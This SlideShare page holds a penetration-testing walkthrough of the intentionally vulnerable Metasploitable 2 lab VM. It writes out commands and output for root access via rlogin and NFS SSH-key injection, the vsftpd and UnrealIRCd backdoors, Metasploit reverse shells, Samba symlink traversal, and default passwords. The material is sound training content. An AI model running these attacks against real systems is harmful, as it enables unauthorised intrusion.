SlideShare a Scribd company logo

Metasploitable

Sri Manakula Vinayagar Engineering College
Sri Manakula Vinayagar Engineering College

Metasploitable, Create the VirtualBox VM

Education
1 of 13
Download to read offline
NIT Nagaland - Online FDP - Cyber Security The Art of Network Exploitation - Walkthrough   Metasploitable : Metasploitable is a virtual machine with several intentional misconfigurations and vulnerabilities for you to exploit. This is a great tool for sharpening your penetration testing skills. Download Metasploitable : Grab a copy of the Metasploitable virtual machine at: ​SourceForge While you are waiting for the file to download you can start setting up the VM. Create the VirtualBox VM Create a new virtual machine in Virtual Box. Give the machine a descriptive name, and select Linux as the type.
Use an Existing Hard Disk During the installation select Use an Existing Hard Disk File and select the downloaded Metasploitable vmdk file.
Once the machine has been created, go ahead and fire it up. Start the VM After the initial boot process you will be greeted by the Metasploitable login screen. The default username is “msfadmin”, and the default password is also “msfadmin”. That is all it takes to install Metasploitable. Now you may be wondering where to begin…. Getting Started After the virtual machine boots, login to console with username ​msfadmin​ and password ​msfadmin​.  From the shell, run the ​ifconfig​ command to identify the IP address.  msfadmin@metasploitable:~$ ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1 inet addr:192.168.99.131 Bcast:192.168.99.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Services From our attack system (Linux, preferably something like Kali Linux), we will identify the open  network services on this virtual machine using the ​Nmap Security Scanner​. The following command  line will scan all TCP ports on the Metasploitable 2 instance:  root@ubuntu:~# nmap -p0-65535 192.168.99.131 Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT Nmap scan report for 192.168.99.131 Host is up (0.00028s latency). Not shown: 65506 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry
1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 3632/tcp open distccd 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 6697/tcp open unknown 8009/tcp open ajp13 8180/tcp open unknown 8787/tcp open unknown 39292/tcp open unknown 43729/tcp open unknown 44813/tcp open unknown 55852/tcp open unknown MAC Address: 00:0C:29:9A:52:C1 (VMware) Nearly every one of these listening services provides a remote entry point into the system. In the  next section, we will walk through some of these vectors.  Unix Basics TCP ports 512, 513, and 514 are known as "r" services, and have been misconfigured to allow remote  access from any host (a standard ".rhosts + +" situation). To take advantage of this, make sure the  "rsh-client" client is installed (on Ubuntu), and run the following command as your local root user. If 
you are prompted for an SSH key, this means the rsh-client tools have not been installed and Ubuntu  is defaulting to using SSH.  # rlogin -l root 192.168.99.131 Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 root@metasploitable:~# This is about as easy as it gets. The next service we should look at is the Network File System (NFS).  NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services.  The example below using ​rpcinfo​ to identify NFS and ​showmount -e​ to determine that the "/" share  (the root of the file system) is being exported. You will need the rpcbind and nfs-common Ubuntu  packages to follow along.  root@ubuntu:~# rpcinfo -p 192.168.99.131 program vers proto port service 100000 2 tcp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 53318 status 100024 1 tcp 43729 status 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100003 4 udp 2049 nfs 100021 1 udp 46696 nlockmgr 100021 3 udp 46696 nlockmgr 100021 4 udp 46696 nlockmgr 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs
100021 1 tcp 55852 nlockmgr 100021 3 tcp 55852 nlockmgr 100021 4 tcp 55852 nlockmgr 100005 1 udp 34887 mountd 100005 1 tcp 39292 mountd 100005 2 udp 34887 mountd 100005 2 tcp 39292 mountd 100005 3 udp 34887 mountd 100005 3 tcp 39292 mountd root@ubuntu:~# showmount -e 192.168.99.131 Export list for 192.168.99.131: / * Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH  is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add  our key to the root user account's authorized_keys file:  root@ubuntu:~# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. root@ubuntu:~# mkdir /tmp/r00t root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/
root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys root@ubuntu:~# umount /tmp/r00t root@ubuntu:~# ssh root@192.168.99.131 Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128 Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 root@metasploitable:~# Backdoors On port 21, Metasploitable2 runs vsftpd, a popular FTP server. This particular version ​contains a  backdoor​ that was slipped into the source code by an unknown intruder. The backdoor was quickly  identified and removed, but not before quite a few people downloaded it. If a username is sent that  ends in the sequence ​:)​ [ a happy face ], the backdoored version will open a listening shell on port  6200. We can demonstrate this with telnet or use the ​Metasploit Framework module​ to  automatically exploit it:  root@ubuntu:~# telnet 192.168.99.131 21 Trying 192.168.99.131... Connected to 192.168.99.131. Escape character is '^]'. 220 (vsFTPd 2.3.4) user backdoored:) 331 Please specify the password. pass invalid ^] telnet> quit Connection closed. root@ubuntu:~# telnet 192.168.99.131 6200
Trying 192.168.99.131... Connected to 192.168.99.131. Escape character is '^]'. id; uid=0(root) gid=0(root) On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. This version contains a backdoor  that ​went unnoticed for months​ - triggered by sending the letters "AB" following by a system  command to the server on any listening port. Metasploit has a ​module​ to exploit this in order to gain  an interactive shell, as shown below.  msfconsole msf > use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131 msf exploit(unreal_ircd_3281_backdoor) > exploit [*] Started reverse double handler [*] Connected to 192.168.99.131:6667... :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead [*] Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 8bMUYsfmGvOLHBxe; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B
[*] B: "8bMUYsfmGvOLHBxern" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700 id uid=0(root) gid=0(root) Much less subtle is the old standby "ingreslock" backdoor that is listening on port 1524. The  ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server.  Accessing it is easy:  root@ubuntu:~# telnet 192.168.99.131 1524 Trying 192.168.99.131... Connected to 192.168.99.131. Escape character is '^]'. root@metasploitable:/# id uid=0(root) gid=0(root) groups=0(root) Unintentional Backdoors In addition to the malicious backdoors in the previous section, some services are almost backdoors  by their very nature. The first of which installed on Metasploitable2 is distccd. This program makes it  easy to scale large compiler jobs across a farm of like-configured systems. The problem with this  service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by  the ​Metasploit module​ usage below.  msfconsole msf > use exploit/unix/misc/distcc_exec msf exploit(distcc_exec) > set RHOST 192.168.99.131
msf exploit(distcc_exec) > exploit [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo uk3UdiwLUq0LX3Bi; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "uk3UdiwLUq0LX3Birn" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700 id uid=1(daemon) gid=1(daemon) groups=1(daemon) Samba, when configured with a writeable file share and "​wide links​" enabled (default is on), can also  be used as a backdoor of sorts to access files that were not meant to be shared. The example below  uses a ​Metasploit module​ to provide access to the root filesystem using an anonymous connection  and a writeable share.  root@ubuntu:~# smbclient -L //192.168.99.131 Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers
tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) root@ubuntu:~# msfconsole msf > use auxiliary/admin/smb/samba_symlink_traversal msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131 msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp msf auxiliary(samba_symlink_traversal) > exploit [*] Connecting to the server... [*] Trying to mount writeable share 'tmp'... [*] Trying to link 'rootfs' to the root filesystem... [*] Now access the following share to browse the root filesystem: [*] 192.168.99.131tmprootfs msf auxiliary(samba_symlink_traversal) > exit root@ubuntu:~# smbclient //192.168.99.131/tmp Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] smb: > cd rootfs smb: rootfs> cd etc smb: rootfsetc> more passwd getting file rootfsetcpasswd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec) root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh [..] Weak Passwords In additional to the more blatant backdoors and misconfigurations, Metasploitable 2 has terrible  password security for both system and database server accounts. The primary administrative user  msfadmin​ has a password matching the username. By discovering the list of users on this system,  either by using another flaw to capture the passwd file, or by enumerating these user IDs via Samba,  a brute force attack can be used to quickly access multiple user accounts. At a minimum, the  following weak system accounts are configured on the system.    In addition to these system-level accounts, the PostgreSQL service can be accessed with username  postgres​ and password ​postgres​, while the MySQL service is open to username ​root​ with an empty  password. The VNC service provides remote desktop access using the password ​password​. 

Recommended

UEFI Firmware Rootkits: Myths and Reality
UEFI Firmware Rootkits: Myths and RealityUEFI Firmware Rootkits: Myths and Reality
UEFI Firmware Rootkits: Myths and RealitySally Feller
 
Metasploit
MetasploitMetasploit
Metasploithenelpj
 
Debugging linux kernel tools and techniques
Debugging linux kernel tools and techniquesDebugging linux kernel tools and techniques
Debugging linux kernel tools and techniquesSatpal Parmar
 
Kernel debug log and console on openSUSE
Kernel debug log and console on openSUSEKernel debug log and console on openSUSE
Kernel debug log and console on openSUSESUSE Labs Taipei
 
Physical Memory Models.pdf
Physical Memory Models.pdfPhysical Memory Models.pdf
Physical Memory Models.pdfAdrian Huang
 
Embedded Recipes 2017 - Introduction to Yocto Project/OpenEmbedded - Mylène J...
Embedded Recipes 2017 - Introduction to Yocto Project/OpenEmbedded - Mylène J...Embedded Recipes 2017 - Introduction to Yocto Project/OpenEmbedded - Mylène J...
Embedded Recipes 2017 - Introduction to Yocto Project/OpenEmbedded - Mylène J...Anne Nicolas
 
BeagleBone Black Booting Process
BeagleBone Black Booting ProcessBeagleBone Black Booting Process
BeagleBone Black Booting ProcessSysPlay eLearning Academy for You
 
malloc & vmalloc in Linux
malloc & vmalloc in Linuxmalloc & vmalloc in Linux
malloc & vmalloc in LinuxAdrian Huang
 

Recommended

UEFI Firmware Rootkits: Myths and Reality
UEFI Firmware Rootkits: Myths and RealityUEFI Firmware Rootkits: Myths and Reality
UEFI Firmware Rootkits: Myths and RealitySally Feller
 
Metasploit
MetasploitMetasploit
Metasploithenelpj
 
Debugging linux kernel tools and techniques
Debugging linux kernel tools and techniquesDebugging linux kernel tools and techniques
Debugging linux kernel tools and techniquesSatpal Parmar
 
Kernel debug log and console on openSUSE
Kernel debug log and console on openSUSEKernel debug log and console on openSUSE
Kernel debug log and console on openSUSESUSE Labs Taipei
 
Physical Memory Models.pdf
Physical Memory Models.pdfPhysical Memory Models.pdf
Physical Memory Models.pdfAdrian Huang
 
Embedded Recipes 2017 - Introduction to Yocto Project/OpenEmbedded - Mylène J...
Embedded Recipes 2017 - Introduction to Yocto Project/OpenEmbedded - Mylène J...Embedded Recipes 2017 - Introduction to Yocto Project/OpenEmbedded - Mylène J...
Embedded Recipes 2017 - Introduction to Yocto Project/OpenEmbedded - Mylène J...Anne Nicolas
 
BeagleBone Black Booting Process
BeagleBone Black Booting ProcessBeagleBone Black Booting Process
BeagleBone Black Booting ProcessSysPlay eLearning Academy for You
 
malloc & vmalloc in Linux
malloc & vmalloc in Linuxmalloc & vmalloc in Linux
malloc & vmalloc in LinuxAdrian Huang
 
Slab Allocator in Linux Kernel
Slab Allocator in Linux KernelSlab Allocator in Linux Kernel
Slab Allocator in Linux KernelAdrian Huang
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchlinuxlab_conf
 
Linux Kernel - Virtual File System
Linux Kernel - Virtual File SystemLinux Kernel - Virtual File System
Linux Kernel - Virtual File SystemAdrian Huang
 
Qemu device prototyping
Qemu device prototypingQemu device prototyping
Qemu device prototypingYan Vugenfirer
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framworkDeepanshu Gajbhiye
 
Launch the First Process in Linux System
Launch the First Process in Linux SystemLaunch the First Process in Linux System
Launch the First Process in Linux SystemJian-Hong Pan
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Lcu14 107- op-tee on ar mv8
Lcu14 107- op-tee on ar mv8Lcu14 107- op-tee on ar mv8
Lcu14 107- op-tee on ar mv8Linaro
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
U Boot or Universal Bootloader
U Boot or Universal BootloaderU Boot or Universal Bootloader
U Boot or Universal BootloaderSatpal Parmar
 
QEMU Disk IO Which performs Better: Native or threads?
QEMU Disk IO Which performs Better: Native or threads?QEMU Disk IO Which performs Better: Native or threads?
QEMU Disk IO Which performs Better: Native or threads?Pradeep Kumar
 
How to use KASAN to debug memory corruption in OpenStack environment- (2)
How to use KASAN to debug memory corruption in OpenStack environment- (2)How to use KASAN to debug memory corruption in OpenStack environment- (2)
How to use KASAN to debug memory corruption in OpenStack environment- (2)Gavin Guo
 
Linux Memory Management with CMA (Contiguous Memory Allocator)
Linux Memory Management with CMA (Contiguous Memory Allocator)Linux Memory Management with CMA (Contiguous Memory Allocator)
Linux Memory Management with CMA (Contiguous Memory Allocator)Pankaj Suryawanshi
 
Windbg cmds
Windbg cmdsWindbg cmds
Windbg cmdskewuc
 
Root file system
Root file systemRoot file system
Root file systemBindu U
 
New Ways to Find Latency in Linux Using Tracing
New Ways to Find Latency in Linux Using TracingNew Ways to Find Latency in Linux Using Tracing
New Ways to Find Latency in Linux Using TracingScyllaDB
 
Understanding a kernel oops and a kernel panic
Understanding a kernel oops and a kernel panicUnderstanding a kernel oops and a kernel panic
Understanding a kernel oops and a kernel panicJoseph Lu
 
Linux Internals - Kernel/Core
Linux Internals - Kernel/CoreLinux Internals - Kernel/Core
Linux Internals - Kernel/CoreShay Cohen
 
Namespaces and cgroups - the basis of Linux containers
Namespaces and cgroups - the basis of Linux containersNamespaces and cgroups - the basis of Linux containers
Namespaces and cgroups - the basis of Linux containersKernel TLV
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecturehugo lu
 
Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Abhichai L.
 
Containers with systemd-nspawn
Containers with systemd-nspawnContainers with systemd-nspawn
Containers with systemd-nspawnGábor Nyers
 

More Related Content

What's hot

Slab Allocator in Linux Kernel
Slab Allocator in Linux KernelSlab Allocator in Linux Kernel
Slab Allocator in Linux KernelAdrian Huang
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchlinuxlab_conf
 
Linux Kernel - Virtual File System
Linux Kernel - Virtual File SystemLinux Kernel - Virtual File System
Linux Kernel - Virtual File SystemAdrian Huang
 
Qemu device prototyping
Qemu device prototypingQemu device prototyping
Qemu device prototypingYan Vugenfirer
 
Launch the First Process in Linux System
Launch the First Process in Linux SystemLaunch the First Process in Linux System
Launch the First Process in Linux SystemJian-Hong Pan
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Lcu14 107- op-tee on ar mv8
Lcu14 107- op-tee on ar mv8Lcu14 107- op-tee on ar mv8
Lcu14 107- op-tee on ar mv8Linaro
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
U Boot or Universal Bootloader
U Boot or Universal BootloaderU Boot or Universal Bootloader
U Boot or Universal BootloaderSatpal Parmar
 
QEMU Disk IO Which performs Better: Native or threads?
QEMU Disk IO Which performs Better: Native or threads?QEMU Disk IO Which performs Better: Native or threads?
QEMU Disk IO Which performs Better: Native or threads?Pradeep Kumar
 
How to use KASAN to debug memory corruption in OpenStack environment- (2)
How to use KASAN to debug memory corruption in OpenStack environment- (2)How to use KASAN to debug memory corruption in OpenStack environment- (2)
How to use KASAN to debug memory corruption in OpenStack environment- (2)Gavin Guo
 
Linux Memory Management with CMA (Contiguous Memory Allocator)
Linux Memory Management with CMA (Contiguous Memory Allocator)Linux Memory Management with CMA (Contiguous Memory Allocator)
Linux Memory Management with CMA (Contiguous Memory Allocator)Pankaj Suryawanshi
 
Windbg cmds
Windbg cmdsWindbg cmds
Windbg cmdskewuc
 
Root file system
Root file systemRoot file system
Root file systemBindu U
 
New Ways to Find Latency in Linux Using Tracing
New Ways to Find Latency in Linux Using TracingNew Ways to Find Latency in Linux Using Tracing
New Ways to Find Latency in Linux Using TracingScyllaDB
 
Understanding a kernel oops and a kernel panic
Understanding a kernel oops and a kernel panicUnderstanding a kernel oops and a kernel panic
Understanding a kernel oops and a kernel panicJoseph Lu
 
Linux Internals - Kernel/Core
Linux Internals - Kernel/CoreLinux Internals - Kernel/Core
Linux Internals - Kernel/CoreShay Cohen
 
Namespaces and cgroups - the basis of Linux containers
Namespaces and cgroups - the basis of Linux containersNamespaces and cgroups - the basis of Linux containers
Namespaces and cgroups - the basis of Linux containersKernel TLV
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecturehugo lu
 

What's hot (20)

Slab Allocator in Linux Kernel
Slab Allocator in Linux KernelSlab Allocator in Linux Kernel
Slab Allocator in Linux Kernel
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratch
 
Linux Kernel - Virtual File System
Linux Kernel - Virtual File SystemLinux Kernel - Virtual File System
Linux Kernel - Virtual File System
 
Qemu device prototyping
Qemu device prototypingQemu device prototyping
Qemu device prototyping
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
Launch the First Process in Linux System
Launch the First Process in Linux SystemLaunch the First Process in Linux System
Launch the First Process in Linux System
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
Lcu14 107- op-tee on ar mv8
Lcu14 107- op-tee on ar mv8Lcu14 107- op-tee on ar mv8
Lcu14 107- op-tee on ar mv8
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
U Boot or Universal Bootloader
U Boot or Universal BootloaderU Boot or Universal Bootloader
U Boot or Universal Bootloader
 
QEMU Disk IO Which performs Better: Native or threads?
QEMU Disk IO Which performs Better: Native or threads?QEMU Disk IO Which performs Better: Native or threads?
QEMU Disk IO Which performs Better: Native or threads?
 
How to use KASAN to debug memory corruption in OpenStack environment- (2)
How to use KASAN to debug memory corruption in OpenStack environment- (2)How to use KASAN to debug memory corruption in OpenStack environment- (2)
How to use KASAN to debug memory corruption in OpenStack environment- (2)
 
Linux Memory Management with CMA (Contiguous Memory Allocator)
Linux Memory Management with CMA (Contiguous Memory Allocator)Linux Memory Management with CMA (Contiguous Memory Allocator)
Linux Memory Management with CMA (Contiguous Memory Allocator)
 
Windbg cmds
Windbg cmdsWindbg cmds
Windbg cmds
 
Root file system
Root file systemRoot file system
Root file system
 
New Ways to Find Latency in Linux Using Tracing
New Ways to Find Latency in Linux Using TracingNew Ways to Find Latency in Linux Using Tracing
New Ways to Find Latency in Linux Using Tracing
 
Understanding a kernel oops and a kernel panic
Understanding a kernel oops and a kernel panicUnderstanding a kernel oops and a kernel panic
Understanding a kernel oops and a kernel panic
 
Linux Internals - Kernel/Core
Linux Internals - Kernel/CoreLinux Internals - Kernel/Core
Linux Internals - Kernel/Core
 
Namespaces and cgroups - the basis of Linux containers
Namespaces and cgroups - the basis of Linux containersNamespaces and cgroups - the basis of Linux containers
Namespaces and cgroups - the basis of Linux containers
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecture
 

Similar to Metasploitable

Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Abhichai L.
 
Containers with systemd-nspawn
Containers with systemd-nspawnContainers with systemd-nspawn
Containers with systemd-nspawnGábor Nyers
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_trainingvideos
 
Linux internet server security and configuration tutorial
Linux internet server security and configuration tutorialLinux internet server security and configuration tutorial
Linux internet server security and configuration tutorialannik147
 
Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A AnalysisApplication of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A AnalysisPositive Hack Days
 
MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)Masami Hiramatsu
 
Creating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server HardeningCreating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server Hardeningarchwisp
 
Free radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleFree radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleChanaka Lasantha
 
Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day Simone Onofri
 
Linux lv ms step by step
Linux lv ms step by stepLinux lv ms step by step
Linux lv ms step by stepsudakarman
 
Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021Jian-Hong Pan
 
Kernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisKernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisAnne Nicolas
 
Dc10 beale-attackdefendunix
Dc10 beale-attackdefendunixDc10 beale-attackdefendunix
Dc10 beale-attackdefendunixPriya Kelkar
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
 
Computer technicians-quick-reference-guide
Computer technicians-quick-reference-guideComputer technicians-quick-reference-guide
Computer technicians-quick-reference-guideShathees Rao
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 

Similar to Metasploitable (20)

Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178
 
Containers with systemd-nspawn
Containers with systemd-nspawnContainers with systemd-nspawn
Containers with systemd-nspawn
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training
 
Linux internet server security and configuration tutorial
Linux internet server security and configuration tutorialLinux internet server security and configuration tutorial
Linux internet server security and configuration tutorial
 
Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A AnalysisApplication of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
 
MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
Vt6655 linux user_guide
Vt6655 linux user_guideVt6655 linux user_guide
Vt6655 linux user_guide
 
Creating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server HardeningCreating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server Hardening
 
Free radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleFree radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmaple
 
Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day Attacking IoT Devices from a Web Perspective - Linux Day
Attacking IoT Devices from a Web Perspective - Linux Day
 
Linux lv ms step by step
Linux lv ms step by stepLinux lv ms step by step
Linux lv ms step by step
 
Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021
 
Kernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisKernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysis
 
Basic Linux kernel
Basic Linux kernelBasic Linux kernel
Basic Linux kernel
 
Dc10 beale-attackdefendunix
Dc10 beale-attackdefendunixDc10 beale-attackdefendunix
Dc10 beale-attackdefendunix
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
 
Computer technicians-quick-reference-guide
Computer technicians-quick-reference-guideComputer technicians-quick-reference-guide
Computer technicians-quick-reference-guide
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
 

More from Sri Manakula Vinayagar Engineering College

Performance Analysis of MIMO–OFDM for PCHBF , RELAY Technique with MMSE For T...
Performance Analysis of MIMO–OFDM for PCHBF , RELAY Technique with MMSE For T...Performance Analysis of MIMO–OFDM for PCHBF , RELAY Technique with MMSE For T...
Performance Analysis of MIMO–OFDM for PCHBF , RELAY Technique with MMSE For T...Sri Manakula Vinayagar Engineering College
 

More from Sri Manakula Vinayagar Engineering College (20)

IoT Methodology.pptx
IoT Methodology.pptxIoT Methodology.pptx
IoT Methodology.pptx
 
ACNS UNIT-5.pdf
ACNS UNIT-5.pdfACNS UNIT-5.pdf
ACNS UNIT-5.pdf
 
2. ACNS UNIT-1.pptx
2. ACNS UNIT-1.pptx2. ACNS UNIT-1.pptx
2. ACNS UNIT-1.pptx
 
1. ACNS UNIT-1.pptx
1. ACNS UNIT-1.pptx1. ACNS UNIT-1.pptx
1. ACNS UNIT-1.pptx
 
7. Multi-operator D2D communication.pptx
7. Multi-operator D2D communication.pptx7. Multi-operator D2D communication.pptx
7. Multi-operator D2D communication.pptx
 
11. New challenges in the 5G modelling.pptx
11. New challenges in the 5G modelling.pptx11. New challenges in the 5G modelling.pptx
11. New challenges in the 5G modelling.pptx
 
8. Simulation methodology.pptx
8. Simulation methodology.pptx8. Simulation methodology.pptx
8. Simulation methodology.pptx
 
10. Calibration.pptx
10. Calibration.pptx10. Calibration.pptx
10. Calibration.pptx
 
9. Evaluation methodology.pptx
9. Evaluation methodology.pptx9. Evaluation methodology.pptx
9. Evaluation methodology.pptx
 
4. Ultra Reliable and Low Latency Communications.pptx
4. Ultra Reliable and Low Latency Communications.pptx4. Ultra Reliable and Low Latency Communications.pptx
4. Ultra Reliable and Low Latency Communications.pptx
 
